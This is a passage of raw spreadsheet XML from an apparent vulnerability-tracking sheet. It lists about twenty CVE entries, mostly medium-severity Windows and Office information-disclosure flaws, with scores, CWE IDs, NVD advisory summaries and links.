t="inlineStr" /><c r="K1239" s="5" t="inlineStr" /><c r="L1239" s="5" t="inlineStr" /><c r="M1239" s="5" t="inlineStr" /><c r="N1239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1239" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1239" s="5" t="inlineStr" /><c r="R1239" s="5" t="inlineStr"><is><t>CWE-434, CWE-94</t></is></c><c r="S1239" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Remote Code Execution (RCE) issue that allows remote authenticated attackers to execute any PHP code via the component installer. It is possible to upload a malicious component into the server, however, it won't be installed, but upload files will be executed. Normally all php files in upload folder are not executed, however, by uploading custom .htaccess it becomes possible. Version 2.18.2 contains a fix.</t></is></c><c r="T1239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54611</t></is></c></row><row r="1240"><c r="A1240" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1240" s="5" t="inlineStr"><is><t>CVE-2026-68830</t></is></c><c r="D1240" s="5" t="n"><v>5.5</v></c><c r="E1240" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1240" s="5" t="inlineStr" /><c r="H1240" s="5" t="n"><v>0.003</v></c><c r="I1240" s="5" t="inlineStr" /><c r="J1240" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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40" s="5" t="inlineStr" /><c r="M1240" s="5" t="inlineStr" /><c r="N1240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1240" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1240" s="5" t="inlineStr" /><c r="R1240" s="5" t="inlineStr"><is><t>CWE-269, CWE-59</t></is></c><c r="S1240" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t></is></c></row><row r="1241"><c r="A1241" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1241" s="5" t="inlineStr"><is><t>CVE-2026-68831</t></is></c><c r="D1241" s="5" t="n"><v>5.5</v></c><c r="E1241" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1241" s="5" t="inlineStr" /><c r="H1241" s="5" t="n"><v>0.003</v></c><c r="I1241" s="5" t="inlineStr" /><c r="J1241" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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41" s="5" t="inlineStr" /><c r="M1241" s="5" t="inlineStr" /><c r="N1241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1241" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1241" s="5" t="inlineStr" /><c r="R1241" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="S1241" s="5" t="inlineStr"><is><t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t></is></c></row><row r="1242"><c r="A1242" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1242" s="5" t="inlineStr"><is><t>CVE-2026-68842</t></is></c><c r="D1242" s="5" t="n"><v>5.5</v></c><c r="E1242" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1242" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1242" s="5" t="inlineStr" /><c r="H1242" s="5" t="n"><v>0.004</v></c><c r="I1242" s="5" t="inlineStr" /><c r="J1242" s="5" t="inlineStr" /><c r="K1242" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1242" s="5" t="inlineStr" /><c r="M1242" s="5" t="inlineStr" /><c r="N1242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1242" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1242" s="5" t="inlineStr" /><c r="R1242" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1242" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t></is></c></row><row r="1243"><c r="A1243" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1243" s="5" t="inlineStr"><is><t>CVE-2026-68843</t></is></c><c r="D1243" s="5" t="n"><v>5.5</v></c><c r="E1243" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1243" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1243" s="5" t="inlineStr" /><c r="H1243" s="5" t="n"><v>0.003</v></c><c r="I1243" s="5" t="inlineStr" /><c r="J1243" s="5" t="inlineStr" /><c r="K1243" s="5" t="inlineStr" /><c r="L1243" s="5" t="inlineStr" /><c r="M1243" s="5" t="inlineStr" /><c r="N1243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1243" s="5" t="inlineStr" /><c r="R1243" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1243" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t></is></c></row><row r="1244"><c r="A1244" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1244" s="5" t="inlineStr"><is><t>CVE-2026-68851</t></is></c><c r="D1244" s="5" t="n"><v>5.5</v></c><c r="E1244" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1244" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1244" s="5" t="inlineStr" /><c r="H1244" s="5" t="n"><v>0.003</v></c><c r="I1244" s="5" t="inlineStr" /><c r="J1244" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1244"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44" s="5" t="inlineStr" /><c r="M1244" s="5" t="inlineStr" /><c r="N1244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1244" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1244" s="5" t="inlineStr" /><c r="R1244" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1244" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t></is></c></row><row r="1245"><c r="A1245" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1245" s="5" t="inlineStr"><is><t>CVE-2026-68852</t></is></c><c r="D1245" s="5" t="n"><v>5.5</v></c><c r="E1245" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1245" s="5" t="inlineStr" /><c r="H1245" s="5" t="n"><v>0.003</v></c><c r="I1245" s="5" t="inlineStr" /><c r="J1245" s="5" t="inlineStr" /><c r="K1245" s="5" t="inlineStr" /><c r="L1245" s="5" t="inlineStr" /><c r="M1245" s="5" t="inlineStr" /><c r="N1245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1245" s="5" t="inlineStr" /><c r="R1245" s="5" t="inlineStr"><is><t>CWE-200, CWE-908</t></is></c><c r="S1245" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t></is></c><c r="T1245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t></is></c></row><row r="1246"><c r="A1246" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1246" s="5" t="inlineStr"><is><t>CVE-2026-68873</t></is></c><c r="D1246" s="5" t="n"><v>5.5</v></c><c r="E1246" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1246" s="5" t="inlineStr" /><c r="H1246" s="5" t="n"><v>0.005</v></c><c r="I1246" s="5" t="inlineStr" /><c r="J1246" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1246" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1246" s="5" t="inlineStr" /><c r="M1246" s="5" t="inlineStr" /><c r="N1246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1246" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1246" s="5" t="inlineStr" /><c r="R1246" s="5" t="inlineStr"><is><t>CWE-532, CWE-908</t></is></c><c r="S1246" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t></is></c></row><row r="1247"><c r="A1247" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1247" s="5" t="inlineStr"><is><t>CVE-2026-68881</t></is></c><c r="D1247" s="5" t="n"><v>5.5</v></c><c r="E1247" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1247" s="5" t="inlineStr" /><c r="H1247" s="5" t="n"><v>0.003</v></c><c r="I1247" s="5" t="inlineStr" /><c r="J1247" s="5" t="inlineStr" /><c r="K1247" s="5" t="inlineStr" /><c r="L1247" s="5" t="inlineStr" /><c r="M1247" s="5" t="inlineStr" /><c r="N1247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1247" s="5" t="inlineStr" /><c r="R1247" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1247" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t></is></c></row><row r="1248"><c r="A1248" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1248" s="5" t="inlineStr"><is><t>CVE-2026-68886</t></is></c><c r="D1248" s="5" t="n"><v>5.5</v></c><c r="E1248" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1248" s="5" t="inlineStr" /><c r="H1248" s="5" t="n"><v>0.005</v></c><c r="I1248" s="5" t="inlineStr" /><c r="J1248" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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48" s="5" t="inlineStr" /><c r="M1248" s="5" t="inlineStr" /><c r="N1248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1248" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1248" s="5" t="inlineStr" /><c r="R1248" s="5" t="inlineStr"><is><t>CWE-209, CWE-416</t></is></c><c r="S1248" s="5" t="inlineStr"><is><t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t></is></c><c r="T1248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t></is></c></row><row r="1249"><c r="A1249" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1249" s="5" t="inlineStr"><is><t>CVE-2026-68895</t></is></c><c r="D1249" s="5" t="n"><v>5.5</v></c><c r="E1249" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1249" s="5" t="inlineStr" /><c r="H1249" s="5" t="n"><v>0.003</v></c><c r="I1249" s="5" t="inlineStr" /><c r="J1249" s="5" t="inlineStr" /><c r="K1249" s="5" t="inlineStr" /><c r="L1249" s="5" t="inlineStr" /><c r="M1249" s="5" t="inlineStr" /><c r="N1249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1249" s="5" t="inlineStr" /><c r="R1249" s="5" t="inlineStr"><is><t>CWE-197</t></is></c><c r="S1249" s="5" t="inlineStr"><is><t>Numeric truncation error in Internet Storage Name Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68895</t></is></c></row><row r="1250"><c r="A1250" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1250" s="5" t="inlineStr"><is><t>CVE-2026-69286</t></is></c><c r="D1250" s="5" t="n"><v>5.5</v></c><c r="E1250" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1250" s="5" t="inlineStr" /><c r="H1250" s="5" t="n"><v>0.004</v></c><c r="I1250" s="5" t="inlineStr" /><c r="J1250" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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0" s="5" t="inlineStr" /><c r="M1250" s="5" t="inlineStr" /><c r="N1250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1250" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1250" s="5" t="inlineStr" /><c r="R1250" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1250" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t></is></c></row><row r="1251"><c r="A1251" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1251" s="5" t="inlineStr"><is><t>CVE-2026-69288</t></is></c><c r="D1251" s="5" t="n"><v>5.5</v></c><c r="E1251" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1251" s="5" t="inlineStr" /><c r="H1251" s="5" t="n"><v>0.003</v></c><c r="I1251" s="5" t="inlineStr" /><c r="J1251" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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1" s="5" t="inlineStr" /><c r="M1251" s="5" t="inlineStr" /><c r="N1251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1251" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1251" s="5" t="inlineStr" /><c r="R1251" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1251" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t></is></c><c r="T1251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t></is></c></row><row r="1252"><c r="A1252" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1252" s="5" t="inlineStr"><is><t>CVE-2026-69294</t></is></c><c r="D1252" s="5" t="n"><v>5.5</v></c><c r="E1252" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1252" s="5" t="inlineStr" /><c r="H1252" s="5" t="n"><v>0.003</v></c><c r="I1252" s="5" t="inlineStr" /><c r="J1252" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1252"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252" s="5" t="inlineStr" /><c r="M1252" s="5" t="inlineStr" /><c r="N1252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1252" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1252" s="5" t="inlineStr" /><c r="R1252" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1252" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t></is></c><c r="T1252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t></is></c></row><row r="1253"><c r="A1253" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1253" s="5" t="inlineStr"><is><t>CVE-2026-69303</t></is></c><c r="D1253" s="5" t="n"><v>5.5</v></c><c r="E1253" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1253" s="5" t="inlineStr" /><c r="H1253" s="5" t="n"><v>0.004</v></c><c r="I1253" s="5" t="inlineStr" /><c r="J1253" s="5" t="inlineStr" /><c r="K1253" s="5" t="inlineStr" /><c r="L1253" s="5" t="inlineStr" /><c r="M1253" s="5" t="inlineStr" /><c r="N1253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1253" s="5" t="inlineStr" /><c r="R1253" s="5" t="inlineStr"><is><t>CWE-125, CWE-191</t></is></c><c r="S1253" s="5" t="inlineStr"><is><t>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69303</t></is></c></row><row r="1254"><c r="A1254" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1254" s="5" t="inlineStr"><is><t>CVE-2026-69308</t></is></c><c r="D1254" s="5" t="n"><v>5.5</v></c><c r="E1254" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1254" s="5" t="inlineStr" /><c r="H1254" s="5" t="n"><v>0.004</v></c><c r="I1254" s="5" t="inlineStr" /><c r="J1254" s="5" t="inlineStr" /><c r="K1254" s="5" t="inlineStr" /><c r="L1254" s="5" t="inlineStr" /><c r="M1254" s="5" t="inlineStr" /><c r="N1254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1254" s="5" t="inlineStr" /><c r="R1254" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1254" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t></is></c></row><row r="1255"><c r="A1255" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1255" s="5" t="inlineStr"><is><t>CVE-2026-69315</t></is></c><c r="D1255" s="5" t="n"><v>5.5</v></c><c r="E1255" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1255" s="5" t="inlineStr" /><c r="H1255" s="5" t="n"><v>0.005</v></c><c r="I1255" s="5" t="inlineStr" /><c r="J1255" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1255"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255" s="5" t="inlineStr" /><c r="M1255" s="5" t="inlineStr" /><c r="N1255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1255" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1255" s="5" t="inlineStr" /><c r="R1255" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1255" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t></is></c><c r="T1255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t></is></c></row><row r="1256"><c r="A1256" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1256" s="5" t="inlineStr"><is><t>CVE-2026-69318</t></is></c><c r="D1256" s="5" t="n"><v>5.5</v></c><c r="E1256" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1256" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1256" s="5" t="inlineStr" /><c r="H1256" s="5" t="n"><v>0.004</v></c><c r="I1256" s="5" t="inlineStr" /><c r="J1256" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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6" s="5" t="inlineStr" /><c r="M1256" s="5" t="inlineStr" /><c r="N1256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1256" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1256" s="5" t="inlineStr" /><c r="R1256" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1256" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t></is></c></row><row r="1257"><c r="A1257" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1257" s="5" t="inlineStr"><is><t>CVE-2026-69321</t></is></c><c r="D1257" s="5" t="n"><v>5.5</v></c><c r="E1257" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1257" s="5" t="inlineStr" /><c r="H1257" s="5" t="n"><v>0.003</v></c><c r="I1257" s="5" t="inlineStr" /><c r="J1257" s="5" t="inlineStr" /><c r="K1257" s="5" t="inlineStr" /><c r="L1257" s="5" t="inlineStr" /><c r="M1257" s="5" t="inlineStr" /><c r="N1257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1257" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1257" s="5" t="inlineStr" /><c r="R1257" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1257" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t></is></c></row><row r="1258"><c r="A1258" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1258" s="5" t="inlineStr"><is><t>CVE-2026-69339</t></is></c><c r="D1258" s="5" t="n"><v>5.5</v></c><c r="E1258" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1258" s="5" t="inlineStr" /><c r="H1258" s="5" t="n"><v>0.005</v></c><c r="I1258" s="5" t="inlineStr" /><c r="J1258" s="5" t="inlineStr" /><c r="K1258" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1258" s="5" t="inlineStr" /><c r="M1258" s="5" t="inlineStr" /><c r="N1258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1258" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1258" s="5" t="inlineStr" /><c r="R1258" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1258" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t></is></c></row><row r="1259"><c r="A1259" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1259" s="5" t="inlineStr"><is><t>CVE-2026-69343</t></is></c><c r="D1259" s="5" t="n"><v>5.5</v></c><c r="E1259" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1259" s="5" t="inlineStr" /><c r="H1259" s="5" t="n"><v>0.004</v></c><c r="I1259" s="5" t="inlineStr" /><c r="J1259" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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59" s="5" t="inlineStr" /><c r="M1259" s="5" t="inlineStr" /><c r="N1259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1259" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1259" s="5" t="inlineStr" /><c r="R1259" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1259" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t></is></c></row><row r="1260"><c r="A1260" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1260" s="5" t="inlineStr"><is><t>CVE-2026-69344</t></is></c><c r="D1260" s="5" t="n"><v>5.5</v></c><c r="E1260" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1260" s="5" t="inlineStr" /><c r="H1260" s="5" t="n"><v>0.004</v></c><c r="I1260" s="5" t="inlineStr" /><c r="J1260" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1260" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1260" s="5" t="inlineStr" /><c r="M1260" s="5" t="inlineStr" /><c r="N1260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1260" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1260" s="5" t="inlineStr" /><c r="R1260" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1260" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t></is></c><c r="T1260" s="6" 